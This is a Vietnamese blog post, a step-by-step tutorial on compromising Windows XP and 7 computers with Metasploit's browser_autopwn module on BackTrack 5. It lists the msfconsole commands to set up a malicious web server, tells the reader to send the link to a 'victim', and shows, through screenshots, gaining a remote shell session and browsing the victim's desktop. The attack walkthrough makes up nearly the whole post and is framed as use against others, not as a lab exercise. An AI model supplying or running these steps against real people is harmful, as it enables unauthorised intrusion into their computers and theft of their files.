Tác giả - Capuchino - Thư ký nữ VHB
Exploit win7-xp dùng browser autopwn với backtrack5
Bước 1:Vào terminal với quyền root
nhập:msfconsole![[Hình: 1.png]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXYBmWaB9lyRAqtcUW5t54tOdEMybpEDkOBVAZgL0PCTa8MhbMnIGxu_T3TiQWsZYT-Oiz4lDHSPpG3ViVzTkD0NdXsep7l-qHlvQYituvmQ9YDamFTh_7V-p7FrDG19n6zqQCjkQpT5c/s1600/1.png)
tiếp tục
use auxiliary/server/browser_autopwn
show options![[Hình: 2.png]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEin5bQeF7EImAOrKv3oyH0OOtxODC27pjIxnIrnjZxLHsW1QpVaBBbkRrwEbKrje16lNuk5cX2nf_B4vArSRfrw8Oe3MMDmoP4cPDmM-j7Wo2qyJT9sTdyR9u1VkWUh3y68HPoNYpcHqKk/s1600/2.png)
Xem ip mình bằng ifconfig để sau này connect về ![[Hình: 3.png]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCkXV16z1sZBfZ-GUQpZA4eMLwj9wiawwo7pbROPOO4wUDi6jzvdOlfvsqxgOnaw3gMV_F8s9saUNGEGWI4rimjcaPMzUS2lM8Bfk6JkpiIH5nmjJKuDYSkEwFissPVyFRpcD7VuGH7ys/s1600/3.png)
ip nhận đc là 192.168.187.130
ta tiếp tục cấu hình
set LHOST 192.168.187.130
set SRVPORT 80
set URIPATH /![[Hình: 4.png]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVJEMma08c2yU2reKdixxjUEPfFGnN-_zmp9lfnQ0M2ABi6_i_4Goug5Bgc_EELcQWWfO8VbXGo0azNyaFL9CuODEr_91Z6F1NvpxLRIWRDYpnGimT-pnOe1pRl9b8DKPyNNUx5pk01Sc/s1600/4.png)
tiếp tục exploit ![[Hình: 5.png]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3nQI31cfSWyj0CJhuOfOPS-iNJVU9s40ipcEkMyquMRlMyeY1mc7Pd3JXBpj315ozM8wMglveLwuEqAIWSJgas2f4DTcebA2T6j2O0KsrUC3a7qY0vB1vSX2qTSgfbWjoqGNHcWp9HpM/s1600/5.png)
Ta chờ nó chạy xong thì nhận đc thế này![[Hình: 6.png]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5n_YzYBCXrAWm8CCpPf1LkIpXOx1JDOj8fKATazFct-vu-fm3223x9hSk5c_iIVXrp5B1vUvYnKk0obwCS0bx9xvR2ZzBwt4y7cqN12xvgU3mtgjd5RZNbWX7KiW3M1rGZ0w1-9NxAqk/s1600/6.png)
Gửi cho victim địa chỉ mình đã open![[Hình: 7.png]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOv3C2sTryP5EhIWqROjvqC_yLso_gXAwSimEqnWKhsrBqelpqNGwljAX2MdDfIEdogrZnRkZU7t85iMPpGtyPBCVaHjh2dEbX6lBXI4fhAcEZTRseMDt6UgauFJgezvOdw1ngMnplLnw/s1600/7.png)
Nếu victim kick vào thì ta nhận đc như sau![[Hình: 8.png]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgexnxVX-VLGdCHixm6vfGUDdF7M8gqIQUxd4PtVqYGOb7kMe5MwBLKz6ecQlhZqxMeHvfpwmhetn7eQU4SAW6vST4JgFODdLnNQjfIdmoEGJVBmrod-CVFHdDIdc0MSq5YxQ8SU86pZcA/s1600/8.png)
nó báo đã migrated thành công,ta kiểm tra thử nào![[Hình: 9.png]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvh2YVlZIQJvuBZTEMqZGYky7L-g4ZxLJYlXIHFLjjlNpf_3mJGOhyphenhyphenLmJRj4QtFSVro_h_GNOogXDOHQvwtzBco7OQtM9zgqIeSD2r6Us6xav_WAxFKgCpct8Re-Pj_kYTFkawBTOVws0/s1600/9.png)
ta thấy victim dùng winxp bản 32bit,tiếp tục![[Hình: 11.png]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAi_yvcvNEExG5OjpQt5nV7nU4y30O9SclqW_TXtriQMbSv_zlb5E3b6CXcZbRvODhg7jSy2W2Q8woyGviBJ4qLm5uv6FacvkDqtJZQpEtDuauPQ0pu8jnqdKXRznpkFS9PB3SPdbjNmk/s1600/11.png)
Ngon ! ta thấy terminal giờ như cmd của win
thao tác thử để xem trên desktop victim có gì nhá![[Hình: 12.png]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiV0ztlCrHR6Tij8tdXD8T0QC1aE4n28EwRKuTEPLq9XBlO2h3rJv-94HN3Z9QIG0SPrn-lZv6xvv1CwfknunEay6K9GM_2iKkHz_sztnykHdHpo9ql816JP1Aoul52hgtjPzXlrYI8jGY/s1600/12.png)
nguồn : VHB ( Học hỏi )
Chủ Nhật, 28 tháng 6, 2015
Exploit win7-xp dùng browser autopwn với backtrack5
đăng lúc 07:04 | in Hacking - Bảo mật
Lưu ý và Thông báo
Trang của chúng tôi lập ra hoàn toàn chia sẽ miễn phí và không lấy bất kỳ khoản tiền nào của các bạn :) nên các bạn vui lòng tôn trọng chúng tôi nhé , Coppy tại trang chúng tôi vui lòng ghi nguồn để tôn trọng tác giã , và chúng tôi ghi nguồn của người khác khi đưa bài vào Blogspot chúng tôi Bấm vào đây để liên hệ chúng tôi.
0 nhận xét: